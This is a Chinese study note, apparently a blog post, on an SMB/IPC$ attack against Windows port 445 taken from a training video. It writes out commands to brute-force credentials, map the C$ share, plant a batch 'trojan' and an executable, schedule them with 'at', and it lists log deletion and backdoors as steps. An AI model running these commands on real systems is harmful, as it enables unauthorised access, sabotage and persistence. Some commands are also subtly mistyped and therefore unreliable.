笔记

由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!

1.授权

2.信息收集(nslookup whois)

3.扫描漏洞

​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;

​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0

​ 扫描网站漏洞(十大网站漏洞 )

4.漏洞利用

5.提权(shell环境命令控制权,桌面环境,最高权限)

=======删库跑路

6.毁尸灭迹(删除日志)

7.留后门

8.渗透测试报告(漏洞,端口)=》安全加固方案

手工测试端口号开放:

​ telnet IP地址 测试端口

映射共享文件夹,在本地电脑F盘

net use f: \10.1.1.2\share ROOT /user:administrator

net use f: \10.1.1.2\share /del

md 文件夹(创建文件夹)

w漏洞利用之IPC$:

net use f: \10.1.1.2\share 密码 /user:用户名

net use f: /del

net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

暴力破解系统密码之445:

445漏洞利用之一IPC$:

1、scanport 扫描445端口

2、进行暴力破解:NTscan

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

4、制作木马

copy con haha.bat

shutdown -s -t 100

^z

拷贝在f:盘

copy haha.bat f:

5、植入木马(留后门)

copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:

net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线

参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)

渗透测试(445端口)相关推荐

  1. 通过Metasploitable2了解渗透测试基本思路

    0×00 前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机.此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术.Metasploit ...

  2. 3.100个渗透测试实战#3(Lampiao)

    目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...

  3. 渗透测试入门15之常见端口安全测试

    在渗透测试中,端口扫描是一个非常重要的环节,端口扫描的目的是了解服务器上运行的服务信息,针对不同的端口进行不同的安全测试,本文的主要内容是关于常见端口安全隐患以及测试方法. DNS(53)UDP DN ...

  4. 渗透测试入门8之端口渗透

    渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...

  5. 《Nmap渗透测试指南》—第6章6.6节源端口欺骗

    本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.6节源端口欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.6 源端口欺骗 表 ...

  6. 渗透测试中常用端口及利用

    渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...

  7. 渗透测试常见的默认端口

    ** 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,欢迎补充. ** ## 1.web常用端口 第三方通用组件漏洞: struts thinkphp jboss gan ...

  8. 渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息

    域名信息收集 什么是信息收集 信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行 比如目标站点IP.中间件.脚本语言.端口.邮箱等等.信息收集包含资产收集但不限于资产收集 信 ...

  9. nmap扫描ipv6端口_web渗透测试系列 之 扫描(3)

    Nmap-扫描器之王 今天我们来聊聊被称之为扫描器之王的nmap,一般我们在渗透的时候都会这样说,第一步nmap开路.Nmap是一款网络扫描和主机检测的工具.开源免费的.可用于:主机发现.端口发现或枚 ...

  10. Kali渗透测试-远程控制:6200端口变成“后门”

    Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...

最新文章

  1. 利用HTML5开发Android
  2. python 信息加密
  3. AXURE RP EXTENSION For Chrome
  4. Jmeter java.lang.OutOfMemoryError: GC overhead limit exceeded
  5. python 文本相似度_python实现余弦相似度文本比较
  6. 扩散(洛谷-P1661)
  7. Nginx——配置负载均衡
  8. c语言 正整数 几位 逆序,c语言经典例题:正整数求位数and求顺、逆序位数
  9. Harmony OS — Image图片
  10. 17. Magento 重写控制器
  11. java服务端验证框架_SpringBoot服务端数据校验过程详解
  12. linux安装php7.3
  13. 024# 关于Adempiere过账日期和会计过账记录的解答
  14. 手把手教你使用Python做数据分析
  15. uniapp小程序体验版-白屏现象
  16. 给自定义Dialog加入保留对话框值的功能
  17. 1988年图灵奖--伊万·萨瑟兰简介
  18. python如何对excel批量加密_用python加密excel工作表
  19. element ui自定义图标
  20. Bitvise SSH Client 8.32下载

热门文章

  1. 基于CNN-LSTM的手写数字识别与应用实现(附tensorflow代码讲解)
  2. 虚拟机ip地址怎么设置
  3. WPF 启动屏幕键盘
  4. xshell卸载注册表删除问题
  5. Windows动态库DllMain
  6. 如何通过芯片手册寻找操作GPIO
  7. 计算机ec键起什么作用,主板acpi 隐形的管家——EC的EC控制器芯片芯片手册
  8. css3 眼珠旋转动画,CSS3小猫咪眼睛随鼠标移动动画特效
  9. Android apk的安装
  10. matlab 8750h,[多图]九代i7-9750H笔记本标压处理器与前代8750H性能对比